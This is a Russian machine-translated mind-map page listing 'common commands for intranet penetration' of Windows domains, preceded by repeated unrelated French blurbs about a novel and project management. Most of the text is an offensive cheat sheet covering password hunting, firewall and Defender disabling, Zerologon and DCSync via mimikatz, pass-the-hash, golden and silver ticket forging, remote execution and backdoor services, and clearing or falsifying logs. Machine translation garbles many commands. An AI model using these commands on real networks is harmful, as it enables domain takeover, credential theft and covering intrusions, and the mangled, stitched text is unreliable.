Галерея диаграмм связей Общие команды для проникновения в интранет
Полное реагирование на чрезвычайные ситуации при эксплуатации и обслуживании сети, включая сбор информации, поиск файлов, Удаленные, запланированные задачи, Переадресация портов, бэкдор, Инструменты, сбор информации, Очистка следов и т.д.
Отредактировано в 2024-03-22 14:57:47Cent ans de solitude est le chef-d'œuvre de Gabriel Garcia Marquez. La lecture de ce livre commence par l'analyse des relations entre les personnages, qui se concentre sur la famille Buendía et raconte l'histoire de la prospérité et du déclin de la famille, de ses relations internes et de ses luttes politiques, de son métissage et de sa renaissance au cours d'une centaine d'années.
Cent ans de solitude est le chef-d'œuvre de Gabriel Garcia Marquez. La lecture de ce livre commence par l'analyse des relations entre les personnages, qui se concentre sur la famille Buendía et raconte l'histoire de la prospérité et du déclin de la famille, de ses relations internes et de ses luttes politiques, de son métissage et de sa renaissance au cours d'une centaine d'années.
La gestion de projet est le processus qui consiste à appliquer des connaissances, des compétences, des outils et des méthodologies spécialisés aux activités du projet afin que celui-ci puisse atteindre ou dépasser les exigences et les attentes fixées dans le cadre de ressources limitées. Ce diagramme fournit une vue d'ensemble des 8 composantes du processus de gestion de projet et peut être utilisé comme modèle générique.
Cent ans de solitude est le chef-d'œuvre de Gabriel Garcia Marquez. La lecture de ce livre commence par l'analyse des relations entre les personnages, qui se concentre sur la famille Buendía et raconte l'histoire de la prospérité et du déclin de la famille, de ses relations internes et de ses luttes politiques, de son métissage et de sa renaissance au cours d'une centaine d'années.
Cent ans de solitude est le chef-d'œuvre de Gabriel Garcia Marquez. La lecture de ce livre commence par l'analyse des relations entre les personnages, qui se concentre sur la famille Buendía et raconte l'histoire de la prospérité et du déclin de la famille, de ses relations internes et de ses luttes politiques, de son métissage et de sa renaissance au cours d'une centaine d'années.
La gestion de projet est le processus qui consiste à appliquer des connaissances, des compétences, des outils et des méthodologies spécialisés aux activités du projet afin que celui-ci puisse atteindre ou dépasser les exigences et les attentes fixées dans le cadre de ressources limitées. Ce diagramme fournit une vue d'ensemble des 8 composantes du processus de gestion de projet et peut être utilisé comme modèle générique.
Общие команды для проникновения в интранет
собрать сообщение
сетевая команда
чистое время/домен сетевая группа «администраторы домена» /домен сетевая группа «контроллеры домена» /домен сетевой администратор пользователя/домен nltest /domain_trusts Получить доверительные отношения домена нлтест /dclist: чистая доля чистый просмотр \\domainip net view /domain Просмотр списка доменов/рабочих групп net view /domain:secwing Просмотр списка компьютеров в домене secwing. net config Рабочая станция запрашивает, к какому домену принадлежит машина netstat -ano |findstr сетевые учетные записи Просмотр локальной политики паролей
установить переменные среды просмотра
nbtstat -запрос ip netbiso эй/все qwinsta //Просмотр статуса входа запрос пользователя //Просмотр времени последнего входа в систему администратора nltest /domain_trusts //Получаем информацию о доверии домена Taskkill /f /im список задач /svc Просмотр процессов список задач /S ip /U домен\имя пользователя /P /V //Просмотр списка процессов удаленного компьютера Tracert IP // Трассировка маршрута маршрутная печать //Печать таблицы маршрутизации arp -a //Показать все активные IP-адреса в этом сегменте сети arp -s (ip MAC) //Привязываем mac и ip адрес arp -d (ip MAC) //Отвязываем Mac и IP-адрес reg-запрос «HKEY_CURRENT_USER\Software\Microsoft\Клиент сервера терминалов\Default» /ve Получить последние записи входа в mstsc setspn -Q \*/\* список SPN
Поиск файлов
findstr находит файлы, содержащие пароли
findstr /si пароль *.txt findstr /si пароль *.xml findstr /si пароль *.ini
каталог найти местоположение файла
каталог /b /s unattend.xml каталог /b /s web.config каталог /b /s sysprep.inf
Удаленно
Отключить брандмауэр
netsh firewall установить режим работы = отключить netsh advfirewall отключил состояние всех профилей
близковетерзащита
чистая остановка ветрозащиты
Восстановить брандмауэр по умолчанию
сброс брандмауэра netsh
Открыть порт 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Сервер /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
CVE-2020-1472
привилегия::отладка секурлса::logonpasswords lsadump::zerologon /target:ip /account:ADC1$ lsadump::zerologon /target:ip /account:ADC1$ /exploit lsadump::dcsync /domain:DC2.com /dc:DC2 /user:administrator /authuser:DC2$ /authdomain:DC2 /authpassword:"" /authntlm sekurlsa::pth/пользователь:администратор/домен:/rc5:161cff084477fe596a5db81874498a24
МПК
net use \\ip\ipc$ пароль /пользователь:домен\пользователь net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] пароль /пользователь:имя_пользователя@домен скопируйте putty.exe \\192.168.0.100\admin$ чистое время \\192.168.0.100 в \\192.168.0.100 19:45 putty.exe net use Z: \\192.168.0.100\c$ Сопоставьте целевой диск c с локальным каталог \\192.168.17.138\c$ скопируйте test.exe \\192.168.17.138\c$ чистое использование * \\192.168.0.100 /del чистое использование * /del /y чистое использование */del сеанс просмотра сетевого использования сетевой сеанс
WMI
wmic qfe get hotfixid //Просмотр установленных исправлений, это очень практично список wmic qfe полный /format:htable > hotfixes.htm //Подробная установка патча wmic qfe // Запросить информацию об исправлении и адрес загрузки, предоставленные Microsoft ping Hostname (имя хоста) // Отобразить IP-адрес имени компьютера wmic Share get name,path //Просмотр пути, указанного SMB wmic nteventlog get path,filename,writeable //Запрос места хранения файлов системного журнала Краткий список сервисов wmic //Просмотр сервисов процессов Краткий список процессов wmic //Просмотр процесса Краткий список запуска wmic //Просмотр информации о программе запуска Краткий список продуктов wmic //Просмотр программы установки и информации о версии (подсказки об использовании уязвимостей) Список запуска wmic заполнен // Определить программы, запускаемые при загрузке процесс wmic, где(description="mysqld.exe") >> mysql.log //Получаем путь установки программного обеспечения wmic /node:ip /user: /p вызов процесса pwd create c:\backdoor.exe wmic /node /user: /password: процесс, в котором e name="cmd.exe" завершается wmic /node:10.10.10.11 /user:administrator /password:1qaz@WSX вызов процесса create «cmd.exe /c ipconfig>c:\result.txt» WMIcmd.exe -h 192.168.1.152 -d имя хоста -u pt007 -p admin123 -c "ipconfig" Процесс wmic /node /user /password, где name="cmd.exe" получает CommandLine
Дела по расписанию
AT-команда (отменена win server2012)
Установить сетевое соединение net use \\192.168.1.100\c$ 1qaz@WSX /домен пользователя\пользователь Скопируйте bat-файл на удаленный компьютер скопируйте exec.bat \\192.168.1.100\c$\windows\debug\exec.bat Просмотр времени на удаленном компьютере чистое время \\192.168.1.100 Создать новую удаленную запланированную задачу в \\192.168.1.100 21.52 c:\windows\temp\exec.bat Просмотр списка удаленных запланированных задач по адресу \\192.168.1.100
Штаски
Создать задачу schtasks /create /s ip /u администратор /пароль /ru «система» /tn adduser(имя) /sc DAILY(время) /tr c:\windows\debug\add.bat /f Запуск задач schtasks /run /s ip /u администратор /p пароль /tn adduser /i schtasks /run /tn update /$ 10.10.10.137 /u test \administrator /p 1qaz@WSX Удалить задачу schtasks /delete /s ip /u администратор /p пароль /tn adduser /f
Команда управления службами SC, встроенная в Microsoft, сотрудничает с общим доступом к файлам и удаленно создает службы.
Установите соединение ipc и выполните SC. чистое использование \\192.168.17.138\c$ "admin123" /user:pt007 чистое использование каталог \\192.168.17.138\c$ скопируйте test.exe \\192.168.17.138\c$ Создать сервис sc \\remote_ip create имя_службы binpath= c:\backdoor.exe sc \\10.10.10.10 создать обновление binpath= c:\programdata\a.bat Запустить службу sc \\remote_ip start имя_службы sc \\10.10.10.10 начать обновление Выведен из эксплуатации sc \\remote_ip остановить имя_службы sc \\10.10.10.10 остановить обновление Удалить услугу sc \\remote_ip удалить имя_службы sc \\10.10.10.10 удалить обновление
Перенаправление порта
Переадресация портов Netsh
netsh firewall show config //Просмотр политики брандмауэра netsh firewall show status //Просмотр политики брандмауэра Включить переадресацию портов netsh интерфейс portproxy добавить v4tov4 Listenaddress=localaddress Listenport=localport Connectaddress=destaddress Connectport=destport открытый брандмауэр netsh advfirewall брандмауэр добавить имя правила = «имя брандмауэра» протокол = TCP dir = в localip = IP localport = порт действие = разрешить Показать все правила переадресации порт-прокси интерфейса netsh показать все Удалить вперед netsh интерфейс portproxy удалить v4tov4 Listenport=port Listenaddress=ip перезагрузить сброс прокси порта интерфейса netsh
SSH-пересылка
1.ssh переадресация портов ssh -L [<локальный хост>:] <локальный порт>:<удаленный хост>:<удаленный порт><имя хоста SSH> 2.ssh обратная переадресация портов ssh -R [<локальный хост>:]<локальный порт>:<удаленный хост>:<удаленный порт><имя хоста SSH> 3.ssh носки-прокси ssh -D [<локальный хост>:] <локальный порт><имя хоста SSH>
черный ход
золотая нота
Условия и требования для золотых купюр: 1. Доменное имя 2. Значение SID домена whoami/user. 3. Хэш пароля NTLM-пароля учетной записи Krbtgt домена. 4. Поддельное имя пользователя sekurlsa::pth /user:administrator /domain:"GOD.org" /ntlm:61465a991b168727b65b3644aab823cd Адрес домена пользователя для входа в систему, значение шифрования ntlm Здесь появится окно CMD. Давайте сначала проверим, есть ли у нас разрешение, используя dir \\OWA.GOD.org\c$ [Просмотр диска C управления доменом]. каталог \\\\DC.zkaq.cn\c$ lsadump::dcsync /user:krbtgt /domain: получите пароль krbtgt [mimikatz имитирует управление доменом и запросит информацию об учетной записи и пароле у целевого элемента управления доменом] Извлеките sid и hashNTLM внутри. Kerberos :: GOLDEN /Admin: администратор /domain:god.org /sign: S-1-5-21-2952760202-13539024381784089 /KRBTGT: 58e91a5886513AB2224312314000 61 /ticket:Administrator.kiribi [Счета за производство] kerberos::pttadmin.kiribi [загрузить билет] Прямая инъекция золотых банкнот kerveros::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:domainsid /krbtgt:hash /ptt Kerberos::purge очищает билеты привилегия::отладка Подождите, пока администратор войдет в систему, чтобы получить пароль. mimikatz #privilege::debug Привилегия «20» ОК mimikatz # разное::memssp Вкололи =) мимикац #выход
серебряные банкноты
Просмотр текущего идентификатора пользователя кто/пользователь Получить хэш целевого компьютера секурлса::logonpasswords 1472 уязвимость Создание серебряных банкнот kerberos::golden /sid:domainsid /domain:test.local /ptt /id: поддельный идентификатор пользователя /target:mdc.test.local /service:cifs /rc: хеш целевого компьютера /user: поддельное имя пользователя
инструмент
dsquery
dsquery.exe user -limit 0#Запрос информации об объекте пользователя dsquery.exe group -limit 0 #Запрос информации об объекте группы dsquery.exe ou -limit 0#Запрос информации об объекте OU dsquery user domainroot -limit 65535 && net user /domain //Перечислить все имена пользователей в домене dsquery server -domain supre.com | dsget server -dnsname -site //Поиск всех контроллеров домена в домене и отображение их DNS-имен хостов и имен сайтов. dsquery contact //Находим контакты в каталоге dsquery subnet //Перечислите подразделения сегмента сети в этом домене dsquery group && net group /domain //Список групп в этом домене dsquery ou //Перечислить организационные подразделения в этом домене dsquery server && net time /domain //Показать список контроллеров домена в этом домене dsquery site -o rdn //Поиск всех имен сайтов в домене dsquery group dc=GOD,dc=org |подробнее Поиск по всем группам в домене dc=god, dc=org dsquery.exe компьютер #Находим компьютер в цели dsquery.exe site #Найти организационные подразделения в каталоге dsquery.exe server #Найдите экземпляр AD DC/LDS в каталоге
ADнайти
AdFind -sc dclist #Список имен контроллеров домена AdFind -sc Computers_active #Запрашивать подключенные к сети компьютеры в текущем домене AdFind -sc компьютеры_активное имя операционной системы #Запрос компьютеров в сети в текущем домене (только отображаемое имя и операционная система) AdFind.exe -sc Computers_active name dnshostname #Запросить активные хосты в домене и вывести имя хоста и имя домена AdFind -f "objectcategory=computer" #Опрос всех компьютеров в текущем домене AdFind -f "objectcategory=computer" name OperatingSystem #Запросить все компьютеры в текущем домене (отображаются только имя и операционная система) AdFind -users name #Опрос всех пользователей в домене AdFind -sc gpodmp #Запросить все объекты групповой политики AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* #Запрос подробной информации обо всех пользователях в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test #Запросить данные конкретного пользователя в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test mail #Запрос конкретной пользовательской информации (почты) в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -dn #Запросить информацию dn всех пользователей в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -c #Запросить количество пользователей в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:* #Запрос подробной информации обо всех группах в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*Admin #Запрос подробной информации обо всех группах в домене, имя группы которых содержит Admin AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc o:* #Запросить все данные OU в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc c:* #Запрос подробной информации обо всех компьютерах в домене AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc s:* #Запрос подробной информации обо всех сайтах в домене
pexec paexec
psexec.exe -accepteula \\10.10.10.137 -u test\administrator -p 1qaz@WSX -i cmd.exe psexec.exe -accepteula -i -s -d cmd paexec.exe \\ip -u домен\пользователь -p pwd cmd.exe -noname net use \\ip pwd /u:domain\user paexec.exe \\ip cmd.exe netsh winhttp sh просмотр прокси-сервера
мультиплексирование портов winrm в сеть
быстрая конфигурация WinRM -q winrm s winrm/config/Client @{TrustedHosts="*"} Добавлен мониторинг порта 80. winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} Изменить 5985 на 80 winrm set winrm/config/Listener?Address=* Transprot=HTTP @{port=80} Измените порт WinRM на веб-порт winrs -r:http://xx -u:DC20\administror -p:1qaz@WSX cmd
Доступ к информации
PowerView
нагрузка Имопорт-Модуль .\PowerView.ps1 #Выполнить запрос Get-DomainGroup #Query сведения о группе Get-DomainOU #Запрос подробной информации о подразделении Get-DomainUser #Запрос сведений о пользователе
psloggendon.exe
имя пользователя psloggedon.exe -l отображает только локальных пользователей, вошедших в систему, и не отображает других пользователей, вошедших в систему в сети. -x не отображает время входа в систему Отображает, что пользователь, вошедший в систему на удаленном компьютере, может ввести: psloggedon \\IP-адрес удаленной машины Добавьте -accepteula впервые, чтобы не отображать информацию об авторских правах.
netsess.exe
netsess.exe \\ПЕРВИЧНЫЙ
PVEFindADUser.exe
PVEFindADUser.exe -текущий
вевтутил
wevtutil epl Security C:\log.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] и System[(EventID=4624) и TimeCreated[timediff(@SystemTime) <= 259200000 ]]]" /r:IP-адрес удаленного компьютера /u:имя пользователя/p:пароль #epl экспортировать журнал #Security означает журнал безопасности. #C:\log.evtx представляет расположение экспортированного журнала. При удаленном экспорте он будет экспортирован на удаленный компьютер. #/q: представляет оператор запроса журнала. #System[(EventID=4624) представляет идентификатор времени 4624, который является журналом успешного входа пользователя в систему. #EventData[Data[@Name='LogonType']='3'] означает, что тип входа — сетевой вход. #TimeCreated[timediff(@System Time) <= 259200000] означает, что будут экспортированы только журналы за последний месяц. Единица измерения 259200000 — миллисекунды. Размер числа можно изменить в соответствии с фактическими потребностями. #Если вы экспортируете локально, вам не нужно указывать параметр /r. Дополнительную информацию об использовании #wevtutil см. в его справочной документации, которую можно использовать для удаления журналов Windows.
логпарсер
LogParser.exe -i:EVT -o csv "ВЫБЕРИТЕ отдельный TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) как USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) как SOURCE_IP FROM C:\*. evtx" > C:\log.csv # -i:EVT означает, что формат ввода журнала — evtx # -o csv означает, что выходной формат — csv # Содержимое в двойных кавычках является оператором запроса # «различение» означает дедупликацию результатов # TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME Анализируем имя журнала из журнала входа в систему # USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) Анализ источника входа в систему из журнала входа в систему # *.evtx может обрабатывать несколько файлов журналов одновременно # Вы можете просмотреть детали журнала входа в систему с помощью следующей команды LogParser.exe -i:EVT -o:DATAGRID «выбрать * из *.evtx»
очистка следов
вевтутил
wevtutil el перечисляет имена всех журналов в системе Система wevtutil cl очищает системные журналы Приложение wevtutil cl очищает журналы приложений wevtutil cl Security очищает журналы безопасности for /f "delims=" %j in('wevtutil.exe el') do @wevtutil.exe cl "%j" c:\windows\system32\winevt\logs\
Защитник Windows
«C:\PROGRA~1\WINDOW~1\mpcmdrun.exe» -Restore -ListAll powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" powershell -Command Add-MpPreference -ExclusionExtension".java" powershell -Command Add-MpPreference -ExclusionProcess "*.exe" powershell -Команда Get-MpPreference
данные для входа по ssh
/var/log/btmp записывает всю информацию об ошибках входа в систему, для просмотра используйте команду Lastb. /var/log/lastlog записывает журнал времени последнего входа всех пользователей в систему. Чтобы просмотреть его, используйте команду Lastlog. /var/log/wtmp записывает информацию о входе и выходе всех пользователей, используйте последнюю команду для просмотра /var/log/utmp записывает информацию о вошедшем в систему пользователе, используйте w, who, user и другие команды для просмотра. /var/log/secure записывает информацию журнала, связанную с безопасностью. /var/log/message записывает информацию и журналы ошибок после запуска системы. Последняя запись входа, отображаемая при входе в ssh время последнего входа с ip Записывается в файл /var/log/lastlog ~/.ssh/known_hosts. Вы можете использовать sed для замены sed -i 's/own ip/original ip' /var/log/lastlog sed -i '/сегодняшняя дата/имя файла Авторизуйтесь в системе незаметно и не будет обнаружен командами w, who, Last и другими командами. ssh -T root@192.168.01 /bin/bash -i